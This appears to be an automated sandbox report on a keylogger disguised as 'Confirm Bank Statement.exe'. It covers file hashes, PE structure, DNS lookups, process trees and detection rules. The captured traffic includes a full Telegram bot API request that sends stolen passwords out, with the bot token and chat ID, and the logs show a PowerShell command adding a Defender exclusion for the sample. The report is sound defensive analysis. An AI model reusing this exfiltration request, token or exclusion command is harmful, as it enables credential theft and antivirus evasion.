                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
10:43:21 | API Interceptor | 10359734x Sleep call for process: Confirm Bank Statement.exe modified
10:43:22 | API Interceptor | 11x Sleep call for process: powershell.exe modified
                                                                                            Process:C:\Users\user\Desktop\Confirm Bank Statement.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1216
                                                                                            Entropy (8bit):5.34331486778365
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                            Malicious:true
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1172
                                                                                            Entropy (8bit):5.357042452875322
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:3CytZWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:yyjWSU4y4RQmFoUeWmfmZ9tK8NDE
                                                                                            MD5:475D428E7231D005EEA5DB556DBED03F
                                                                                            SHA1:3D603ED4280E0017D1BEB124D68183F8283B5C22
                                                                                            SHA-256:1314488A930843A7E1A003F2E7C1D883DB44ADEC26AC1CA096FE8DC1B4B180F5
                                                                                            SHA-512:7181BDCE6DA8DA8AFD3A973BB2B0BA470468EFF32FFB338DB2662FEFA1A7848ACD87C319706B95401EA18DC873CA098DC722EA6F8B2FD04F1AABD2AEBEA97CF9
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):7.6207958727249006
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            File name:Confirm Bank Statement.exe
                                                                                            File size:578'560 bytes
                                                                                            MD5:d16a155d98d41cf4109fc2ebe34c0ab4
                                                                                            SHA1:93176aab1ccb1db112204c4860405bb9bffa1c9b
                                                                                            SHA256:e5eab0d46a0a0500431f1ef78dd03c8dc17b97794f558624dfa7a567e24245e1
                                                                                            SHA512:2aa7fe4a1c2c06dcca016cd3894d2336631ceb4bb1a829b63bd3a07d2cab5262e24ab52508c7ee34f977c2e35966a33dc082b1bd25c543e0008a7c15080cb864
                                                                                            SSDEEP:12288:AfyYRxA4Y5lyA/BxSPCrAlaYf43LVB5g1FzgL8LXxmjaY6nUreuFwWR:qRkAsgI/5QRgILXM29uiW
                                                                                            TLSH:93C4E054365AE803C0A20EB01922D3F957789E9DE921D3438FE93EFF7DB9B562540392
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0......&......:.... ........@.. .......................@............@................................
                                                                                            Icon Hash:f0aea8aaaa8ee80f
                                                                                            Entrypoint:0x48cb3a
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x6785CCBC [Tue Jan 14 02:32:28 2025 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                            Instruction
                                                                                            jmp dword ptr [00402000h]
                                                                                            and dword ptr [eax], eax
                                                                                            inc eax
                                                                                            add byte ptr [ebx], ah
                                                                                            add byte ptr [eax+eax], ah
                                                                                            and eax, 26005E00h
                                                                                            add byte ptr [edx], ch
                                                                                            add byte ptr [eax], ch
                                                                                            add byte ptr [ecx], ch
                                                                                            add byte ptr [edi], bh
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [edx+003E9999h], bl
                                                                                            add byte ptr [eax], al
                                                                                            aas
                                                                                            int CCh
                                                                                            dec esp
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8cae8 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8e000 | 0x22d4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x92000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x8ab68 | 0x8ac00 | 1ff71d1df20cf885d3f1998cff38a5d6 | False | 0.8904191300675676 | data | 7.627355501282747 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x8e000 | 0x22d4 | 0x2400 | 5468a5643056f6bfa0ffb3e3c8442132 | False | 0.8772786458333334 | data | 7.375363829856805 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x92000 | 0xc | 0x200 | fe880a5fee753de0eb99881a72f7ab1d | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x8e0c8 | 0x1e50 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9755154639175257
RT_GROUP_ICON | 0x8ff28 | 0x14 | data | | | 1.05
RT_VERSION | 0x8ff4c | 0x384 | data | | | 0.43222222222222223
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-14T16:43:28.173614+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49701 | 132.226.8.169 | 80 | TCP
2025-01-14T16:43:34.454787+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49701 | 132.226.8.169 | 80 | TCP
2025-01-14T16:43:35.111519+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 49729 | 149.154.167.220 | 443 | TCP
2025-01-14T16:43:35.509681+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.7 | 49729 | 149.154.167.220 | 443 | TCP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 14, 2025 16:43:23.060368061 CET | 192.168.2.7 | 1.1.1.1 | 0xfa84 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 14, 2025 16:43:28.122761965 CET | 192.168.2.7 | 1.1.1.1 | 0xa002 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 14, 2025 16:43:34.405653000 CET | 192.168.2.7 | 1.1.1.1 | 0x5da9 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 14, 2025 16:43:23.067289114 CET | 1.1.1.1 | 192.168.2.7 | 0xfa84 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 14, 2025 16:43:23.067289114 CET | 1.1.1.1 | 192.168.2.7 | 0xfa84 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 16:43:23.067289114 CET | 1.1.1.1 | 192.168.2.7 | 0xfa84 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 16:43:23.067289114 CET | 1.1.1.1 | 192.168.2.7 | 0xfa84 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 16:43:23.067289114 CET | 1.1.1.1 | 192.168.2.7 | 0xfa84 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 16:43:23.067289114 CET | 1.1.1.1 | 192.168.2.7 | 0xfa84 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 16:43:28.130083084 CET | 1.1.1.1 | 192.168.2.7 | 0xa002 | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 16:43:28.130083084 CET | 1.1.1.1 | 192.168.2.7 | 0xa002 | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 16:43:28.130083084 CET | 1.1.1.1 | 192.168.2.7 | 0xa002 | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 16:43:28.130083084 CET | 1.1.1.1 | 192.168.2.7 | 0xa002 | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 16:43:28.130083084 CET | 1.1.1.1 | 192.168.2.7 | 0xa002 | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 16:43:28.130083084 CET | 1.1.1.1 | 192.168.2.7 | 0xa002 | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 16:43:28.130083084 CET | 1.1.1.1 | 192.168.2.7 | 0xa002 | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 16:43:34.413548946 CET | 1.1.1.1 | 192.168.2.7 | 0x5da9 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                            • reallyfreegeoip.org
                                                                                            • api.telegram.org
                                                                                            • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49701 | 132.226.8.169 | 80 | 4244 | C:\Users\user\Desktop\Confirm Bank Statement.exe

Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 16:43:23.088149071 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 14, 2025 16:43:25.513681889 CET | 273 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:43:25 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 16:43:25.514343023 CET | 273 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:43:25 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 16:43:25.518198013 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 14, 2025 16:43:28.121232986 CET | 273 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:43:27 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 16:43:33.967077971 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 14, 2025 16:43:34.401592970 CET | 273 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:43:34 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49705 | 104.21.64.1 | 443 | 4244 | C:\Users\user\Desktop\Confirm Bank Statement.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-14 15:43:28 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-14 15:43:28 UTC | 861 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:43:28 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2184197
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0%2F0yo%2F1oQtV2PxsFJ0bUz81sIUZNsffmDq%2F7VdNXYOCHaoResVaYwilbP0fRc5Lh3egSvFcCqJG8uMYb5C1uHEy%2B9QhShcaaASxp%2FJ6eYVk%2FbYHQzaDoN2Ho387QNtDvHm9OclKk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901ebdec9f1fc358-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1537&rtt_var=611&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1899804&cwnd=155&unsent_bytes=0&cid=50d6075d2213d69f&ts=203&x=0"
2025-01-14 15:43:28 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.749729149.154.167.2204434244C:\Users\user\Desktop\Confirm Bank Statement.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-14 15:43:35 UTC299OUTPOST /bot8161619263:AAGh7P51iOu7fKM21V3X_t2ljzNjQ9YsI9E/sendDocument?chat_id=1780630805&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary================8dd34884aef51fe
                                                                                            Host: api.telegram.org
                                                                                            Content-Length: 1088
                                                                                            Connection: Keep-Alive
                                                                                            2025-01-14 15:43:35 UTC1088OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 38 38 34 61 65 66 35 31 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                            Data Ascii: --===============8dd34884aef51feContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                            2025-01-14 15:43:35 UTC388INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0
                                                                                            Date: Tue, 14 Jan 2025 15:43:35 GMT
                                                                                            Content-Type: application/json
                                                                                            Content-Length: 545
                                                                                            Connection: close
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                            Data Ascii: {"ok":true,"result":{"message_id":521,"from":{"id":8161619263,"is_bot":true,"first_name":"NOVA2025","username":"santiokaorbot"},"chat":{"id":1780630805,"first_name":"Collins","username":"cio_santos","type":"private"},"date":1736869415,"document":{"file_na



                                                                                            Target ID:0
                                                                                            Start time:10:43:20
                                                                                            Start date:14/01/2025
                                                                                            Path:C:\Users\user\Desktop\Confirm Bank Statement.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\Confirm Bank Statement.exe"
                                                                                            Imagebase:0xc90000
                                                                                            File size:578'560 bytes
                                                                                            MD5 hash:D16A155D98D41CF4109FC2EBE34C0AB4
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1274255090.0000000007240000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1267719440.000000000313C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:10:43:21
                                                                                            Start date:14/01/2025
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe"
                                                                                            Imagebase:0x4d0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:4
                                                                                            Start time:10:43:21
                                                                                            Start date:14/01/2025
                                                                                            Path:C:\Users\user\Desktop\Confirm Bank Statement.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\Confirm Bank Statement.exe"
                                                                                            Imagebase:0x430000
                                                                                            File size:578'560 bytes
                                                                                            MD5 hash:D16A155D98D41CF4109FC2EBE34C0AB4
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:false

                                                                                            Target ID:6
                                                                                            Start time:10:43:21
                                                                                            Start date:14/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true


                                                                                              Execution Graph

                                                                                              Execution Coverage:10.5%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:3.2%
                                                                                              Total number of Nodes:94
                                                                                              Total number of Limit Nodes:5

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274442520.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7280000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hq$Hq$Hq$Hq$Hq
                                                                                              • API String ID: 0-3799487529

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (q$Hq
                                                                                              • API String ID: 0-1154169777
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hq$Hq
                                                                                              • API String ID: 0-925789375
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Teq$Teq
                                                                                              • API String ID: 0-2938103587
